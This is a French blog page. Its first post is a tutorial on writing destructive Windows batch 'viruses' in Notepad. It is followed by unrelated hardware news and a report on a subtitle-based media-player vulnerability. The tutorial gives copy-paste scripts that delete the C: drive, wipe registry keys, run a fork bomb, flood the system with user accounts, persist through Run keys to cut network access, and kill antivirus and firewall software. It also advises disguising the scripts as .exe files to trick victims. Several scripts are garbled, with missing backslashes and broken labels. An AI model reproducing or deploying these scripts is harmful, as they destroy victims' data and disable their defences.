Powered By Blogger

Rechercher sur ce blogue

jeudi 22 juin 2017

Comment créer un virus avec Notepad



Comment créer un virus dangereux avec Notepad ,pour contre-attaquer un Hacker !


 Les virus sont des logiciels malveillants qui peuvent causer beaucoup de dommages à P.C., ordinateur et ordinateur portable. Habituellement, ils se répandent grâce au partage de fichiers spécialement sur Internet. Le partage de fichiers Torrents et les pièces jointes aux courriers électroniques sont des moyens courants de propagation d'un virus.
 
Avant d'entrer dans les détails, permettez-moi d'expliquer quel est un fichier batch? Il s'agit simplement d'un fichier texte contenant des séries de commandes exécutées automatiquement, ligne par ligne, lorsque le fichier batch s'exécute. J'ai utilisé plusieurs virgules pour diviser la phrase en plusieurs parties pour faciliter la compréhension.
 
Ainsi, en utilisant Batch File, vous pouvez créer des virus extrêmement dangereux pour supprimer les fichiers Windows, formater différents lecteurs (C:, D:, E :), voler des informations, désactiver les pare-feu.
 
Maintenant, voici quelques virus de fichiers par lots, mais extrêmement dangereux. Vous devez simplement appuyer sur Ctrl + C (Copier) et Ctrl + V (Coller) dans le Bloc-notes. Ensuite, enregistrez le fichier du bloc-notes comme "anyname.bat". Assurez-vous d'utiliser '.bat' comme extension, sinon cela ne fonctionnera pas.


1. Application Bomber:-
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Fonction: une fois exécuté, il va commencer à ouvrir plusieurs applications à plusieurs reprises, ce qui affectera les performances du système. Vous pouvez également ajouter une application de votre choix dans le code ci-dessus.

2. Folder Flooder-

@echo off
😡
md %random%
/folder.
goto x
Fonction: une fois exécuté, il va commencer à générer des dossiers dont le nom peut être n'importe quel nombre aléatoire.

3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x
Fonction: une fois exécuté, il va commencer à créer des comptes utilisateur Windows dont le nom peut être un nombre aléatoire.

4. Process Creator:-

%0|%0
Fonction: - Une fois exécuté, il commencera à générer un grand nombre de processus très rapidement entraînant une suspension de P.C.

5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
Fonction: une fois exécuté, il désactive la connexion Internet d'un ordinateur en permanence.

6. O.S. Hacker:-

@Echo off
Del C: *.* |y
Fonction: - Une fois qu'il sera exécuté, il formatera le lecteur de disque C et entraînera donc la suppression de l'O.S. Vous pouvez également remplacer C par n'importe quel lecteur de votre choix.

7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Fonction: - Une fois exécuté, il supprime les fichiers de registre et laisse un message. Cela peut très affecter l'ordinateur de la victime.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Fonction: - Une fois qu'il est exécuté, il sera activé et désactivé par Caps Lock en cas d'ennui de l'utilisateur.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda
software*.*
rem

Fonction: - Une fois exécuté, il désactivera Anti Virus du système de la victime.

L'inconvénient d'un fichier batch est que n'importe qui peut l'ouvrir avec un bloc-notes et lire la commande facilement. En outre, tout le monde peut le supprimer s'il le juge nuisible. Ainsi, pour surmonter la limitation / inconvénient, vous pouvez utiliser un outil cool nommé 'Batch to Exe Converter'. Il convertira l'extension '.bat' en extension '.exe'. Et votre fichier Batch sera converti en un fichier d'application. Vous pouvez facilement convaincre votre victime d'ouvrir le fichier.
Un message personnel à vous
C'est agréable de voir que vous avez passé par «Post Facebook Status in Future» complètement. J'espère que vous avez apprécié cet article. Cependant, si vous voulez que je livre des tutoriels et des articles de piratage plus intéressants, merci de partager mes postures. Vous pouvez utiliser le Widget de partage social fourni à la fin de chaque publication. Après tout, le partage est pris en charge !!!
Je vous remercie. Avoir une belle journée à l'avance!!!


REF.:

Samsung gravera les composants de nos smartphones en 4nm d’ici trois ans

La société coréenne vient de dévoiler une roadmap très volontariste pour les trois à quatre années à venir. L’objectif est d’introduire une nouvelle technologie pour remplacer le FinFET et d’atteindre progressivement le plancher incroyable des 4 nm.

Piratage par les sous-titres de vos lecteurs VLC, Kodi, Popcorn Time et Stremio



Faites attention! Ils peuvent vous pirater à travers des sous-titres pendant que vous regardez des films
Les sous-titres malvaillants peuvent permettre aux pirates informatiques de compromettre votre ordinateur et peut-être votre téléviseur tout en regardant des films.
Les chercheurs de sécurité de Check Point ont annoncé un nouveau vecteur d'attaque qui affecte et menace des millions d'utilisateurs à travers le monde. En créant des fichiers de sous-titres malveillants, qui sont ensuite téléchargés par le lecteur multimédia d'une victime, les pirates peuvent compromettre les appareils utilisateurs via des vulnérabilités trouvées dans les lecteurs multimédias populaires tels que VLC, Kodi, Popcorn-Time et Stremio. Environ 200 millions de lecteurs vidéo et de streamers qui exécutent actuellement les programmes vulnérables, ce qui rend cette attaque la plus répandue. Les chercheurs de sécurité de Check Point croient que des défauts de sécurité similaires existent également dans les autres lecteurs multimédias.
La vidéo suivante montre comment les victimes peuvent être piratées par des sous-titres méchants (suspects) en utilisant l'un des lecteurs multimédias affectés, où le code malveillant caché s'exécute une fois que le film est joué. Sur le côté droit de l'écran se trouve l'ordinateur de l'attaquant, qui exécute le système d'exploitation pirate, Kali Linux qui attend que l'ordinateur de la victime se connecte à son ordinateur.
Les chercheurs de Check Point ont déjà signalé les vulnérabilités aux développeurs des applications VLC, Kodi, Popcorn Time et Stremio. Les utilisateurs sont invités à mettre à jour leur logiciel de lecteur multimédia dès que possible.


REF.:

Intel Coffee Lake : une huitième génération de Core toujours en 14nm





La huitième génération de processeurs Intel Core, nom de code du Coffee Lake, sera lancée dans la deuxième moitié de 2017. Plus tôt que prévu, mais avec une gravure en 14nm.

Plus tôt ce mois-ci, Intel a levé quelques interrogations pendant une conférence dédiée aux investisseurs : la huitième génération d’Intel Core, qui répond au doux nom de Coffee Lake, prendra le relais du Kaby Lake dès le second semestre 2017. Intel aurait donc accéléré la commercialisation de sa solution, et promet une amélioration des performances d’environ 15 % par rapport à la génération précédente. Par contre, la conséquence de ce changement de feuille de route est visible : la gravure sera en 14nm. Ce sont des puces que l’on pourrait retrouver à termes sur quelques netbooks et Chromebooks haut de gamme sous Android ou Chrome OS.

Il faudra encore patienter jusqu’à 2018 pour les gravures plus fines, avec du 10nm en 2018. A priori, le 10nm sera donc réservé à Cannon Lake, une solution très attendue, surtout face à son principal concurrent : AMD.
En effet, AMD va lever les voiles sur Ryzen en mars prochain. Ryzen mettra en vedette huit cœurs et 16 threads dans sa partie haut de gamme, avec des versions à six et quatre cœurs sur le reste de la gamme. AMD pourrait se refaire une santé, avec une solution aussi puissante que l’Intel Core i7 6900K, mais avec un TDP plus faible et des prix plus bas. Le tout avec une gravure de 14nm.

Du côté des puces ARM, Qualcomm, Samsung et Apple préparent l’arrivée des premières puces gravées en 10nm. Le Qualcomm Snapdragon 835 sera d’ailleurs la première puce commercialisée avec cette finesse de gravure.

REF.:

Intel: Les CPU Core i9 pour la première fois avec une bête de 18 noyaux



La nouvelle série Core X d'Intel présente les CPU Core i9 pour la première fois avec une bête de 18 noyauxIntel a annoncé sa nouvelle gamme de processeurs série Core X basés sur les architectures Skylake-X et Kabylake-X. Avec les versions mises à niveau des processeurs Core i5 et i7, la série présente également quatre CPU Core i9 pour la première fois. Le nouveau phare Intel Core i9 Extreme, qui est publié séparément, comporte 18 cœurs.Il s'est avéré que les rumeurs concernant les nouveaux processeurs Core i9 d'Intel étaient réellement vraies. Chez Computex 2017, le géant du silicium a annoncé une nouvelle génération de la famille de processeurs appelée Intel Core X-Series. Il apporte des versions plus puissantes des CPU de base Core-i5 et Core-i7 existantes ainsi que les nouvelles CPU Core-i9.La plupart des processeurs Core X sont construits en utilisant la version améliorée de l'architecture ancienne d'Intel, connue sous le nom de Skylake-X qui gère la plupart des CPU dans le dernier catalogue de version. Il y a aussi des processeurs Kaby Lake-X, mais il n'y a pas beaucoup de puissant et il n'y a que l'option CPU 4-core. Toutes ces CPU de la famille Intel Core X seront installées dans le socket LGA 2066, aussi appelé Socket R4.Il y a aussi des processeurs Kaby Lake-X, mais ils ne sont pas très puissants et il n'y a que l'option CPU 4-core. Toutes ces CPU de la famille Intel Core X seront installées dans le socket LGA 2066, aussi appelé Socket R4.
Intel a également lancé le nouveau chipset X299 pour continuer avec les processeurs de la série X. La société présentera les cartes mères X299 à base de chipset dans les prochains jours.En ce qui concerne le prix, il commence à partir de 242 $ pour Intel Core i5-7640X (4 cœurs, 4 fils) et va jusqu'à 1699 $ pour Intel Core i9-7960X (16 noyaux, 32 threads).Intel Core X 2Crédit: IntelIntel affirme que la série Core X s'adresse aux professionnels et aux amateurs de jeux. Les processeurs prennent en charge la mémoire DDR4 à double canal (Kaby Lake-X) et quad-canaux et sont parfaits pour une multitude de besoins tels que le jeu 12K et l'édition vidéo, un support VR amélioré utilisant de multiples GPU discrets et des écrans.Intel Core XCrédit: IntelPour une amélioration accrue des performances, Intel a introduit Turbo Boost Max 3.0, qui, dans le cas de Core i9, augmente la fréquence d'horloge à 4,5 GHz.Intel affirme que ces processeurs sont supérieurs à ceux de la génération précédente. Ils sont 10% plus rapides pendant le traitement multithread et 15% pendant le traitement du thread unique.Les CPU Core X peuvent avoir jusqu'à 44 lignes PCIe 3.0 permettant aux utilisateurs de profiter des cartes graphiques externes, des SSD plus rapides et de l'interface Thunderbolt 3. Intel a récemment annoncé qu'ils rendraient Thunderbolt 3 sans redevance et serait intégré dans les futures CPU.Intel Core i9 ExtremeIntel Core i9 extremeCrédit: IntelCore i9 Extreme, avec 18 cœurs et 36 fils, est libéré séparément de la série Core X. Le processeur de bureau phare d'Intel est livré avec un prix de $ 1,999 qui dépasse largement le budget d'un rêveur. Évidemment, ce n'est pas destiné à eux.


Bientôt, nous acheterons des PC équipés d'une famille de processeurs haut de gamme Intel. L'entreprise s'est associée à divers fabricants de matériel informatique tels que Dell, Asus, Gigabytes, HP, Acer, MSI, Origin etc. et Amazon pour la vente de processeurs autonomes.8ème génération de processeurs Intel CoreIntel a également laissé tomber quelques nouvelles sur les 8ème processeurs Intel Core à venir, basés sur l'architecture de 14nm Coffee Lake d'Intel. La société affirme, selon les derniers résultats d'essais, que leurs processeurs de prochaine génération ont maintenant une performance d'environ 30% que les processeurs actuels basés sur l'architecture de Kaby Lake.


REF.: